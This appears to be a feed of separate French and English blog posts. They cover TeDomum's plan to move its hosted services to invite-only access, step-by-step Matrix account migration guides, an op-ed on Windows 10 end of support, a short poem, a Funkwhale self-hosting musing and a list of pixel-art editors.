Parmi les actions que je configure, il y a la recherche d'une définition avec def: exécutant exo-open --launch WebBrowser https://fr.wiktionary.org/wiki/%u ; ou encore, l'accès en ssh à mon serveur : exo-open --launch TerminalEmulator ssh mon_serveur.

Nous avons débuté cet été le déploiement des inscriptions à nos services sur seule invitation. Cette bascule se traduit par deux transformations :

1. La mise à disposition d'une nouvelle instance Hiboo sur auth.tedomum.fr réservée aux invitées, sur laquelle s'appuieront progressivement tous nos services.
2. La réinstanciation de nos services Matrix vers tedomum.fr pour assurer un nettoyage impossible sinon et faciliter la bascule d'authentification.

Matrix était un début et l'ensemble de nos services doit progressivement être réservé sous invitation. Ce qui suit est une proposition soumise à discussion détaillant le raisonnement par service.

Services Fediverse

Nous hébergeons actuellement plusieurs services sur le Fediverse : une instance Mastodon, une instance Peertube, une instance WriteFreely et une instance Pixelfed.

Pour basculer ces services sur invitation il nous faut basculer l'authentification. La tentation est forte pour Mastodon et WriteFreely plutôt spammés de déployer une instance propre, d'autant que la migration de compte est facilitée sur Mastodon.

Concernant Peertube bien que peu spammée, l'instance héberge du contenu pornographique, dans un contexte légal de plus en plus incertain à ce sujet malgré les NSFW clairement indiqués. Il est possible que nous interdisions à terme le contenu pornographique et démarrions à cette occasion une nouvelle instance.

Cela se traduirait dans ce cas par une nouvelle URL en tedomum.fr pour chacun de ces services et une période de migration comparable à ce que nous avons mis en place pour Matrix.

WriteFreely est peu maintenu mais très robuste, rien ne nous indique de changer quoi que ce soit sur les choix technologiques, tandis que Pixelfed est tout aussi peu maintenu mais très fragile. Il est probable que ce dernier soit abandonné.

S'il faut re-déployer une instance, Mastodon est lourd de maintenance, et a des dépendances pas triviales comme un back-end Redis pour les taches distribuées (dont nous ne bénéficions que très marginalement). Des alternatives plus légères compatibles avec les mêmes clients existent et sont à étudier sur le plan des outils de modération et de la robustesse, notamment Pleroma et GoToSocial. À ne pas négliger non plus Misskey et ses forks, de la même complexité que Mastodon mais fonctionnellement plus complets, qui pourraient compenser l'absence de Pixelfed.

Enfin si nous réinstancions un service Fediverse principal, probablement autour du micro-blogging, nous pouvons réfléchir à fédérer directement sur notre domaine racine et ainsi fournir des identifiants en @tedomum.fr de même que les identifiants Matrix sont en :tedomum.fr.

La proposition la plus intéressante à notre avis :

• instancier en premier un Peertube sur video.tedomum.fr, en pensant la configuration collectivement, et laisser 6 mois à tout le monde pour migrer, la pornographie y sera probablement interdite ;
• réfléchir à une possible alternative à Mastodon collectivement, tester autant que nécessaire et se décider début 2026 pour la suite, instancier ce que nous aurons choisi et fermer l'instance Mastodon 3 à 6 mois plus tard ;
• basculer l'authentification de WriteFreely mais conserver son URL, attendre quelques mois encore avant de décider ou pas de le réinstancier, certainement toujours sur le même logiciel ;
• fermer Pixelfed début 2026.

Migrations faciles

Les services Nextcloud, Miniflux et DNS ont un nombre raisonnable d'utilisateurices, sont déjà authentifiés sur Hiboo et sont assez peu dépendants de l'URL : il suffit de reconfigurer un client lourd, ou même simplement de mettre à jour ses favoris. En prime contrairement au Fediverse, il est aisé pour nous de supporter 2 URL en parallèle.

Le fonctionnement parallèle sur deux instances Hiboo distinctes est très difficile pour une partie des utilisateurices. Nous développerons cette fin d'année une mise à jour de Hiboo permettant la migration de ses profils d'une instance à une autre. Par souci de cohérence nous sommes bien-entendu tentés de basculer les URL vers tedomum.fr.

Aussi, si Miniflux et les DNS sont hébergés sur notre cluster Kity, Nextcloud ne s'y trouve pas encore. Un nettoyage est nécessaire au préalable.

La proposition la plus intéressante à notre avis :

• terminer le développement de la fonctionnalité de migration Hiboo et organiser la bascule ;
• ouvrir les services Miniflux et DNS sur une URL en tedomum.fr et organiser le changement de favoris et la configuration des clients sous 3 mois ;
• nettoyer Nextcloud, le migrer vers Kity et opérer la même bascule d'URL sur 6 mois.

Forge

Nous hébergeons actuellement une forge complète : Gitlab, Gitlab CI, Gitlab pages pour les sites statiques. Cette forge est d'une part difficile à migrer vers Kity bien que nous ayons préparé une partie de la manœuvre, elle a été énormément spammée par ailleurs.

Nous sommes intéressés pour tester Forgejo, qui offre des fonctionnalités similaires à Gitlab et laisse entrevoir une fédération, dans un projet véritablement communautaire, bien plus léger que Gitlab et a priori plus maintenable. Plusieurs problèmes toutefois : non seulement l'hébergement des dépôts Git de Forgejo sur un cluster Kubernetes n'est pas trivial, là où Gitlab offre un mode cluster de Gitaly, mais également la migration implique des changements profonds.

Il faudrait probablement réécrire une partie des scripts de CI, et repenser l'hébergement des pages statiques. Si nous profitons de la migration d'authentification pour engager un tel changement, c'est certainement notre projet le plus ambitieux de 2026, pour lequel nous devons encore faire de nombreux tests.

La proposition la plus censée à notre avis :

• engager ce mois de décembre des tests autour de Forgejo pour mesurer véritablement dans quelle aventure on se lance avec un tel projet ;
• prendre la décision au plus tard en mars et accepter que ce projet si nous le démarrons durera tout 2026, soit le nettoyage de spam et migration Gitlab, soit la bascule Forgejo.

Hébergement d'images

Ce service est très peu utilisé depuis quelques années. Toutefois il héberge un gros historique inséré en images statiques sur de nombreux sites. Il est donc indispensable de continuer à servir ces images, au moins le temps d'une migration lente.

Aussi, tant que nous conservons WriteFreely, un usage même en faible volume est souhaitable pour héberger les pièces-jointes. L'accès sous authentification est souhaitable pour limiter le spam et l'hébergement de contenus illégaux.

Il permettrait aussi d'assurer les fonctions de suppression des images. Des développements ou le choix d'un nouveau logiciel seraient requis, y-compris pour stocker les fichiers sur notre backend S3. Ce pourrait être NextCloud en mode galerie, ou un autre logiciel correctement maintenu.

La proposition la plus intéressante à notre avis :

• engager une réflexion sur les alternatives, notamment la pertinence d'utiliser NextCloud simplement ;
• héberger l'historique d'images en site statique Garage et fermer le service.

Les pads

Ce service est beaucoup utilisé, mais pour des pads de courte durée. Nous avons ponctuellement subi du spam ou du défacement désagréable, ce qui pourrait motiver une activation du SSO.

Une piste sérieuse serait l'activation de SSO sur ce service pour la création de nouveaux documents, tout en autorisant le partage sans authentification, à la responsabilité des propriétaires de partager le lien responsablement.

Une telle bascule serait un changement majeur pour nombre d'utilisateurices, aussi cela pose forcément la question de l'implémentation. Nous avons plusieurs fois observé Cryptpad comme alternative à Etherpad mais la bascule était trop coûteuse pour être justifiée. On doit se reposer la question.

La proposition la plus censée à notre avris :

• tester à nouveau Cryptpad avec les utilisateurices pendant 2 mois et décider d'une éventuelle bascule logicielle ;
• quelle que soit l'issue, déployer en février une nouvelle instance de la solution retenue avec une URL en tedomum.fr et un SSO pour la création de pads ;
• annoncer la fermeture de l'actuel sous 3 à 6 mois.

Les services sans SSO

Les services d'emails, blogs et ntfy resteront vraisemblablement hébergés sans SSO. Si un SSO était intégré ce serait une nouvelle fonctionnalité qui ne demande de fait pas de migration.

Nous pouvons discuter de l'instanciation d'un ntfy en tedomum.fr pour éviter la confusion, c'est presque gratuit pour nous.

Tous les mots, ils me sont tombés dessus en troupe Toute la journée, donc bon, je me détends la croupe. Pendant mon exposé j'oubliais mes deux pieds.

J'ai protégé ma bouche, et j'ai lavé mon muffle. Mes pas me rappellent les pas de mon vieux buffle. Comme lui sait, je sais où ne pas être épié.

mouffle Souffle Souple qui s'accouple

Monte à la haute tour. Les escaliers sont cabossés – Tant de poussière autour – Les portes coincées tournent, Non, stop, Dès qu'on s'est adossé.

Trébuche sur le phare. Tu voulais pas rester si tard Mais t'as tout oublié, Je vais te mettre sur le quai La porte est verrouillée.

Dis mec, Tu vois là la falaise ? Un pays plat sur des murs noirs. Le bouton droit fond dans le soir. Des vies dégueu comme les braises Mouillées, Prévues pour midi treize.

Ma fille, tu fras baby-sitteure. Fils, toi, tu seras pédophile. P'importe! Va, accroît la pile. Va, de main en main, en ferveur, Et demain tombe, un entre mille.

Là-bas les bombes pleuvent. Le train roule trop et toujours. Ma ceinture me serre pour – Faudrait pas que je meuve. Dommage! Ma mauviette, mon bleu, tu t'émeuves.

Prisons sur trois cent kilomètres. Joyeux départs aux mêmes maîtres! Pourquoi pas dire à ceux qui comptent Toute l'actualité. Rester barbouillé·es de honte Sans savoir qu'y est monté.

A few weeks ago, we announced a major services evolution regarding our Matrix service, especially the migration of our Matrix server to a new domain, tedomum.fr (invite-only).

This article aims to guide you through the simplest possible migration to the home server tedomum.fr. The migration requires a maximum of 1h, but it can take up to 2 days according to our responding time to provide you an invitation link.

The tedomum.net home server will be discontinued on December 15th, 2025, thus we recommend you to migrate your account prior to November 30th. If you use our bridges services, which will be gradually interrupted between Sept 15th and Nov 15th, we do recommend you to migrate them as soon as possible.

Differences tedomum.net and tedomum.fr

The first one is obvious. The domain changes and your Matrix address (MXID) will last with the :tedomum.fr domain. This new domain will host progressively several TeDomum services.

Your login account will change as well. It still relies on Hihoo, with the same interface to login and the same features, but the URL will now be auth.tedomum.fr instead of auth.tedomum.net. This will be a new account. If you use other TeDomum services, you will still keep access to your .net account, and both will merge towards tedomum.fr in the next few months to become more convenient.

The new service has data retention limits. The message history in public rooms will be cleaned after 6 months for messages from other servers. Media issued from other servers will be cached 3 days. In addition, you will get a 2 Go quota for sending files, the files will be cleaned after 3 months without viewing them to recover your storage quota.

Finally, public rooms with many members can be restricted (around 1000 members). To join one of these, you will have to make a request to the TeDomum staff.

Full step by step migration

This migration process is quite complete. If you don't want to keep your conversations history, you can skip to next chapter (quick migration).

1. Do some cleaning: on your current Matrix account, leave rooms that are no longer of interest to you and that you do not want to keep. Once cleaned, if you want to keep the history of some private rooms, export the entire encryption keys (in Element, “Options”, “Encryption”, “Export keys”) and keep the file safely.

2. Contact us by any usual channel to request an invitation, for example via our general room or via our support chat interface.

3. Once you have received the invitation, sign up. You can safely use the same credentials as your other TeDomum account. If you store the password, make sure to distinguish it and associate it with auth.tedomum.fr to avoid any confusion.

4. Ideally, use a computer with a browser, or at least a tablet. The migration is possible but more difficult on a smartphone via a browser in “desktop navigation” mode.

5. Visit our our Element client and follow the authentification and registration procedure until you access your new Matrix account.

6. From your client on the old account, invite your new account to all the rooms you want to keep. You can also decide to create new rooms or new conversations with your contacts whose history you do not care about.

7. Import the encryption keys exported at step (1) to access the encrypted room history you want to keep (in Element, “Options”, “Encryption”, “Import Keys”).

8. Verify that you have access to all your rooms and their history. On your old account, leave the remaining rooms and disconnect all sessions. This old account will be automatically deleted on December 15th.

9. Log in to your new account on the client of your choice by pointing it to the server tedomum.fr, then follow the validation procedure for the new client. You can of course keep element.tedomum.fr in your browser if it's the most convenient for you, but make sure everything is accessible before disconnecting it.

Quick migration

This procedure allows you to migrate very quickly, but will not preserve your message history. In essence, it consists of creating a new account, reopening conversations, and closing the old account.

1. Contact us through any usual channel to request an invitation, for example via our general room or via our support chat interface.

2. Once you have the invitation, sign up. You can safely use the same credentials as your other TeDomum account. If you store the password, make sure to distinguish it and associate it with auth.tedomum.fr to avoid any confusion.

3. Clean up: on your current Matrix account, leave the rooms that no longer have any interest for you and that you do not want to keep. Make a list of the remaining conversations (note the identifiers of your contacts and rooms), notify your close contacts if necessary, and leave all the rooms.

4. You can disconnect from your old account and connect to your new account by specifying the server tedomum.fr. You can use our Element client if needed. .

5. Join all the rooms and contact your close contacts from the new account.

2025, l'année où les politiques numériques sont confrontées à leur manque de vision.

Après des années de déploiement d'outils Microsoft dans les services publics et de ministres du numérique actionnaires du géant américain¹, la fin de Windows10 prévue pour octobre 2025 marquera-t-elle un tournant en matière de stratégie publique numérique ? Ou bien, la France continuera-t-elle à se faire imposer l'obsolescence de son parc informatique, des conditions générales d'utilisation aberrantes, et le potentiel usage des données des utilisateurs pour entrainer des Intelligences Artificielles toujours plus voraces en datas ?

La fin d'une histoire d'amour

Microsoft, l'a annoncé puis démenti puis finalement l'a confirmé, le 14 octobre 2025 sera la date de fin des mises à jour de sécurité de windows 10². Ce qui veut dire que tous les ordinateurs sous windows 10 seront exposés aux multiples failles de sécurité du système d'exploitation. Et donc que toutes les machines sous windows 10 connectées à Internet ne sont plus utilisables. Ce n'est pas la première fois que Microsoft arrête les mises à jour de sécurité des anciennes versions de windows. Ce qui change cette fois c'est que l'entreprise américaine impose des pré-requis matériel à l'installation de Windows11 qui correspondent à des ordinateurs très récents. Donc que des postes informatiques tout à fait fonctionnels se retrouvent inutilisables en l'état. Cela concerne énormément de postes dans le monde et donc en France. Le Canard Enchaîné a ainsi rapporté que près de 19000 postes informatiques de la police nationale seraient obsolètes à partir du 14 octobre³. Si cette fin annoncée n'a pas fait grand bruit en dehors de la sphère des libristes et des entreprises informatiques, elle aura deux principales conséquences pour l'État et les collectivités territoriales : une augmentation des investissements avec des postes qui ne sont pas encore amortis et un désastre écologique de plus. Le nombre de 240 millions d'ordinateurs qui ne pourraient pas passer à windows11 a été annoncé, mais ce ne sont que des estimations. Impossible donc de savoir le nombre exact de postes concernés mais ce qui est sûr c'est que le chiffre sera très élevé. Pour l'État, qui a annoncé vouloir faire des économies dans tous les ministères et pour les collectivités territoriales dont les dotations ne cessent de baisser, cette information aurait dû déclencher une vague d'indignation voire de réponses politiques fortes, pourtant jusqu'ici peut ont été les responsables politiques à battre ce fer-là. On peut toutefois citer quelques exemples de grandes villes à avoir fait des annonces dans ce sens ces dernières semaines : Grenoble⁴, Lyon ou encore Strasbourg. On est encore loin de la prise de conscience nationale. Annonces non pas anti-Microsoft mais pour la souveraineté numérique.

Le compteur tourne

Il ne reste donc que quelques semaines aux organisations qui n'ont pas encore pris la mesure de ce cataclysme technique pour réagir. Heureusement, plusieurs solutions sont encore possibles et rien n'est joué. Microsoft propose en effet de payer 30$ pour s'abonner à windows10 Extended Security Updates (ESU), qui pour l'instant ne doit durer qu'un an. Donc une option pour repousser l'échéance à l'an prochain. Il existe aussi des outils pour forcer la mise à jour vers windows11 comme Flyby11 / Flyoobe qui sont des utilitaires qui permettent de passer les barrières de windows update. À ce jour, je n'ai pas encore testé moi-même cet outil. Attention windows11 est un outil à manipuler avec beaucoup de précaution. Il est rempli d'outils “IA” en tous genres et le nouveau programme Recall le rend extrêmement dangereux pour les données personnelles des utilisateurices⁵. La meilleure solution, bien que la plus fastidieuse, reste de quitter pour toujours l'univers Windows/Microsoft. C'est le choix fait par certaines administrations il y longtemps, comme la Gendarmerie. Cette voie est en effet la plus vertueuse car les alternatives à Windows existantes (Zorin, Ubuntu, Mint, Debian, Primtux, ...) peuvent fonctionner sur des ordinateurs de toutes générations. Elles respectent toutes la vie privée des utilisateurs et sont dans une logique de simplification des usages. Elle implique cependant de questionner les outils informatiques utilisés et donc d'avoir du temps pour prendre de la hauteur. Le temps, voilà une chose que l'on a plus car je vous rappelle que la date est fixée au 14 octobre et que le compteur tourne.

---

¹ https://www.usine-digitale.fr/editorial/dans-la-declaration-d-interets-de-clara-chappaz-des-actions-chez-nvidia-microsoft-amazon.N2233756)

² https://www.microsoft.com/fr-fr/windows/end-of-support

³ https://www.presse-citron.net/18-746-ordinateurs-obsoletes-windows-10-police/

⁴ https://www.grenoble.fr/1048-transition-numerique-responsable.htm

⁵https://www.lemondeinformatique.fr/actualites/lire-la-fonction-controversee-recall-de-microsoft-relancee-96716.html

⁶https://aidelinux.gogocarto.fr/

(View 🇬🇧 English version).

Il y a une semaine nous annoncions une évolution majeure des services de TeDomum, en particulier le remplacement du serveur Matrix tedomum.net par un nouveau service tedomum.fr sur invitation uniquement.

Cet article a pour but de vous accompagner pour une migration la plus simple possible vers tedomum.fr. La migration nécessite au maximum 1h de votre temps, mais elle peut s'étaler jusqu'à 2 jours si nous tardons à vous fournir une invitation.

Le service tedomum.net sera interrompu le 15 décembre 2025, nous vous recommandons donc de migrer au plus tard le 30 novembre. Si vous utilisez nos services de bridges, qui seront interrompus progressivement entre le 15 septembre et le 15 novembre, nous vous recommandons de migrer dès que possible.

Les différences entre tedomum.net et tedomum.fr

La première est évidente, le domaine change et votre nouvelle adresse Matrix (MXID) se terminera donc par :tedomum.fr au lieu de :tedomum.net. Ce nouveau domaine accueillera progressivement plusieurs services de TeDomum.

Votre compte d'accès change également. Il s'appuie toujours sur Hiboo, avec la même interface et les mêmes fonctionnalités, mais sur auth.tedomum.fr au lieu de auth.tedomum.net. C'est un nouveau compte, un compte supplémentaire si vous utilisez d'autres services de TeDomum. Les deux fusionneront vers tedomum.fr d'ici quelques mois pour vous simplifier la vie.

Le nouveau service a des limites de conservation des données. L'historique de messages des salons publics est nettoyé après 6 mois pour les messages provenant d'autres serveurs. Les médias d'autres serveurs sont conservés 3 jours en cache. En outre, vous disposerez d'un quota de 2 Go pour l'envoi de fichiers, les envois étant nettoyés après 3 mois sans consultation pour retrouver votre quota.

Enfin, les salons publics avec de nombreux membres sont restreints (limite à 1000 membres environ). Pour les rejoindre vous devrez en faire la demande auprès de l'équipe.

Migration complète étape par étape

Cette démarche de migration est probablement la plus complète. Si vous ne souhaitez pas spécialement conserver l'historique de vos conversations, alors vous pouvez avancer jusqu'au chapitre suivant qui documente une migration rapide.

Idéalement munissez-vous d'un ordinateur avec un navigateur, ou à défaut d'une tablette. La migration est possible mais plus difficile sur un smartphone via un navigateur en mode « navigation de bureau ».

1. Rendez-vous sur notre ancien client Element et authentifiez-vous si ce n'est pas déjà le cas. Ou bien utilisez Element installé et déjà connecté sur votre ordinateur. Attention les fonctions d'export de clés ne sont pas disponibles sur Element X sur mobile.

2. Faites du nettoyage : sur votre compte Matrix actuel quittez les salons qui n'ont plus d'intérêt pour vous et que vous ne souhaitez pas conserver. Une fois nettoyé, si vous souhaitez conserver l'historique de certains salons privés, exportez l'ensemble des clés de chiffrement (dans Element, « Options », « Chiffrement », « Exporter les clés ») et conservez le fichier en sécurité.

3. Contactez-nous par tout canal habituel pour demander une invitation, par exemple rendez-vous sur notre salon général ou à défaut sur notre interface de chat de support.

4. Une fois l'invitation obtenue, inscrivez-vous. Vous pouvez sans risque employer le même nom d'utilisateur et le même mot-de-passe que votre autre compte TeDomum. Si vous stockez le mot-de-passe, pensez à bien le distinguer et l'associer à auth.tedomum.fr pour éviter toute confusion.

5. Rendez-vous sur notre client Element et suivez la procédure d'authentification et d'inscription jusqu'à accéder à votre nouveau compte.

6. Depuis votre client sur l'ancien compte, invitez votre nouveau compte sur tous les salons que vous comptez conserver. Vous pouvez aussi décider de créer de nouveaux salons ou de nouvelles conversations avec vos contacts dont l'historique vous importe moins.

7. Importez les clés de chiffrement exportées à l'étape (1) pour accéder à l'historique des salons chiffrés que vous souhaitez conserver (dans Element, « Options », « Chiffrement », « Importer les clés »).

8. Vérifiez que vous avez accès à tous vos salons et leur historique. Sur votre ancien compte, quittez les salons restants et déconnectez toutes les sessions. Cet ancien compte sera supprimé automatiquement le 15 décembre.

9. Connectez votre nouveau compte sur le client de votre choix en le pointant vers le serveur tedomum.fr, puis suivez la procédure de validation du nouveau client. Vous pouvez bien sûr conserver element.tedomum.fr dans votre navigateur si c'est le plus pratique pour vous, sinon vérifiez que tout est bien accessible avant de le déconnecter.

Migration rapide

Cette procédure permet de migrer très rapidement, mais ne conservera pas votre historique de messages. En somme, elle consiste à créer un nouveau compte, réouvrir des conversations, et fermer l'ancien compte.

1. Contactez-nous par tout canal habituel pour demander une invitation, par exemple rendez-vous sur notre salon général ou à défaut sur notre interface de chat de support.

2. Une fois l'invitation obtenue, inscrivez-vous. Vous pouvez sans risque employer le même nom d'utilisateur et le même mot-de-passe que votre autre compte TeDomum. Si vous stockez le mot-de-passe, pensez à bien le distinguer et l'associer à auth.tedomum.fr pour éviter toute confusion.

3. Faites du nettoyage : sur votre compte Matrix actuel quittez les salons qui n'ont plus d'intérêt pour vous et que vous ne souhaitez pas conserver. Faites la liste des conversations restantes (notez les identifiants de vos contacts et de vos salons), prévenez éventuellement vos contacts proches et quittez tous les salons.

4. Vous pouvez vous déconnecter de votre ancien compte puis vous connecter au nouveau compte en indiquant le serveur tedomum.fr. Vous pouvez au besoin utiliser notre client Element.

5. Rejoignez tous les salons et contactez vos proches depuis le nouveau compte.

Où l’on imagine concurrencer Deezer et Spotify (mais en local)

Cela fait quelques temps (hem... environ 11 jours) que je suis revenu sous Linux, avec tout le cortège de satisfactions personnelles que cela peut m’apporter que je me suis dit que sur ma lancée, je pourrais peut-être tenter de construire un streaming/réseau social – local – musical.

En me basant sur hum... au hasard Funkwhale!

J’ai réussi à formater un disque dur, qui me donnerait pas mal de stockage pour quelques pistes à partager vie une instance... Je vais me pencher sur le problème mais je ne sais pas s’il est plus sage de songer tout de suite à un hébergement ailleurs ou d’essayer tout de même d’auto-héberger cette instance.

Je me demande vraiment si un vieux Raspberry Pi 3 peut tenir le choc...

Pour créer des jeux vidéo, il est nécessaire de connaître quelques outils ! Voici une sélection de logiciels permettant de créer des pixart, des sprites, des décors...

PixiEditor

Pixieditor est un éditeur 2D universel qui a été conçu pour vous fournir des outils et des fonctionnalités pour tous vos besoins 2D. Créez de beaux sprites pour vos jeux, animations, modifiez des images, créez des logos. Tous emballés dans une interface intuitive et familière.

Pixelorama

Libérez votre créativité avec Pixelorama, un logiciel de Pixel Art open-source puissant et accessible. Que vous souhaitiez créer des sprites, des carreaux, des animations ou simplement vous exprimer dans le langage de l'art des pixels, ce logiciel réalisera vos rêves parfaits avec des pixels avec une vaste boîte à outils de fonctionnalités.

LibreSprite

LibreSprite est un programme gratuit et open source pour créer et animer vos sprites.

RetroSprite

Avec RetroSprite, dessinez vos sprites et vos arrière-plans avec ce programme spécialement conçu pour les consoles rétro.

GIMP

Oui ! Notre bon vieux GIMP permet, avec une petite configuration, de créer des sprites et du pixel art ! Voici un tutoriel ! https://thegimptutorials.com/how-to-make-pixel-art/

#Pixart #Pixel #Game